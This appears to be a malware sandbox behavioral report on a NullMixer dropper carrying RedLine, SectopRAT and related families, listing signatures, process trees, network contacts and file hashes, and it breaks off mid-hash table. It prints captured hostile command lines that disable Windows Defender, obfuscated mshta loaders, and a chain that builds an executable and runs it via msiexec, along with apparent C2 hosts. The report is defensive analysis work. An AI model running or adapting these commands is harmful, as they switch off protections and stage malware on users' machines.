| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| US | 8.8.8.8:53 | 215.133.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral23
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240903-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2100 set thread context of 888 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe |
| PID 580 set thread context of 1156 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068cfd71e196da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06dffacb42ccf1c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0625413f2fb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06d8092a5ae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0639114ac9fa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GN9NQ.tmp\Wed067fa7edd4b875a.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062a0488e6dd1.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0625413f2fb.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed067ba5199af5f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed067fa7edd4b875a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06d8092a5ae.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0639114ac9fa.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed068cfd71e196da.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed068a6c101a0e81.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed062a0488e6dd1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06384ea2548.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0625413f2fb.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed062272ee8a02b1746.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06dffacb42ccf1c.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062a0488e6dd1.exe
Wed062a0488e6dd1.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe
Wed067fa7edd4b875a.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0625413f2fb.exe
Wed0625413f2fb.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe
Wed067ba5199af5f.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068cfd71e196da.exe
Wed068cfd71e196da.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06dffacb42ccf1c.exe
Wed06dffacb42ccf1c.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06d8092a5ae.exe
Wed06d8092a5ae.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0639114ac9fa.exe
Wed0639114ac9fa.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06384ea2548.exe
Wed06384ea2548.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2724 -s 272
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe
Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\is-GN9NQ.tmp\Wed067fa7edd4b875a.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GN9NQ.tmp\Wed067fa7edd4b875a.tmp" /SL5="$601E0,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe
Wed062272ee8a02b1746.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct( "WSCrIpT.ShELl").RuN ("cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF """"=="""" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe"" ) do taskkill /F /im ""%~NXm"" " ,0,true ))
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp" /SL5="$3018E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe" 05XkvF6f.EXe&&stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF ""=="" for %m In ( "C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe" ) do taskkill /F /im "%~NXm"
C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe
05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /im "Wed062272ee8a02b1746.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct( "WSCrIpT.ShELl").RuN ("cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF ""/PttJqbtIGV_gKpayWgLcpQuUGXL9h""=="""" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" ) do taskkill /F /im ""%~NXm"" " ,0,true ))
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" 05XkvF6f.EXe&&stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF "/PttJqbtIGV_gKpayWgLcpQuUGXL9h"=="" for %m In ( "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" ) do taskkill /F /im "%~NXm"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpt: ClOse ( cReateobJecT( "wScriPT.shEll" ). Run("C:\Windows\system32\cmd.exe /q /C Echo | sEt /P = ""MZ"" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS+ ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n &STart msiexec -y .\M9WDkH25.n " ,0, TrUe))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C Echo | sEt /P = "MZ" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS+ ZSPELY.cNM + OJM3YR.X+ SVnzW.C2+ AmtZY.zXT+ LPME79O.f1+ NytFSko.4 m9WDKH25.n &STart msiexec -y .\M9WDkH25.n
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Echo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>X5W6AA.ZS"
C:\Windows\SysWOW64\msiexec.exe
msiexec -y .\M9WDkH25.n
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 456
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | mooorni.xyz | udp |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 127.0.0.1:49262 | tcp | |
| N/A | 127.0.0.1:49264 | tcp | |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.82:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | www.qxsgxd.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.22:80 | crl.microsoft.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp |
Files
\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe
| MD5 | 35799316b448a835e4784fbdd26b5648 |
| SHA1 | fc39b78cc7615b4cbc65aff8b4d14d7b1b234cd5 |
| SHA256 | 2a41d70eb106e926765798e9a407e88e49c07099247cd33924d7faa60e3e7ef0 |
| SHA512 | ae2d8b3bccbe0e7820ba6c25d76251c400b40a40fbd610b182ae8ec51154e66670b30cf13a62d06067024e9ffb9447bea6647be312e2c01f0ac6c4ea602a9660 |
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/2640-54-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2640-63-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2640-62-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2640-61-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2640-72-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2640-68-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2640-71-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2640-70-0x000000006494A000-0x000000006494F000-memory.dmp
memory/2640-69-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2640-67-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2640-66-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2640-65-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2640-64-0x000000006FE40000-0x000000006FFC6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC12262D6\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
\Users\Admin\AppData\Local\Temp\7zSC12262D6\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2640-50-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06dffacb42ccf1c.exe
| MD5 | cf1ef22fba3b8080deab8dd3ec2dbe79 |
| SHA1 | 62c57835497002d7f760fabb77969281b4ccf3e0 |
| SHA256 | 0826cf8b1478cc5c892d724e30c9d69a0fd765780f916bb0943d73f3cd3866e0 |
| SHA512 | 7a997cbbbdccc75a624ee9f67632024479fdb7a1588c462479c0d4b967373290640bd6b98d08f633d5e71d026faf5343de1d3a61c125e1a04d5ea518275a9e1f |
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0625413f2fb.exe
| MD5 | 69c4678681165376014646030a4fe7e4 |
| SHA1 | fb110dad415ac036c828b51c38debd34045aa0f3 |
| SHA256 | 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77 |
| SHA512 | 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c |
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062a0488e6dd1.exe
| MD5 | c950dfa870dc50ce6e1e2fcaeb362de4 |
| SHA1 | fc1fb7285afa8d17010134680244a19f9da847a1 |
| SHA256 | b7fd0c0227a445847a051fe986bc517e2b136682d98dbe5349e2bc75e0e9e4ec |
| SHA512 | 4117875063173b5767b98300d493e2aee310a76651411ceb2f34588ae5785a0893979699c10e07d0f52d84442db6967b7155875bc7ef738a8e2c49fa70acd1f2 |
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06384ea2548.exe
| MD5 | bdbbf4f034c9f43e4ab00002eb78b990 |
| SHA1 | 99c655c40434d634691ea1d189b5883f34890179 |
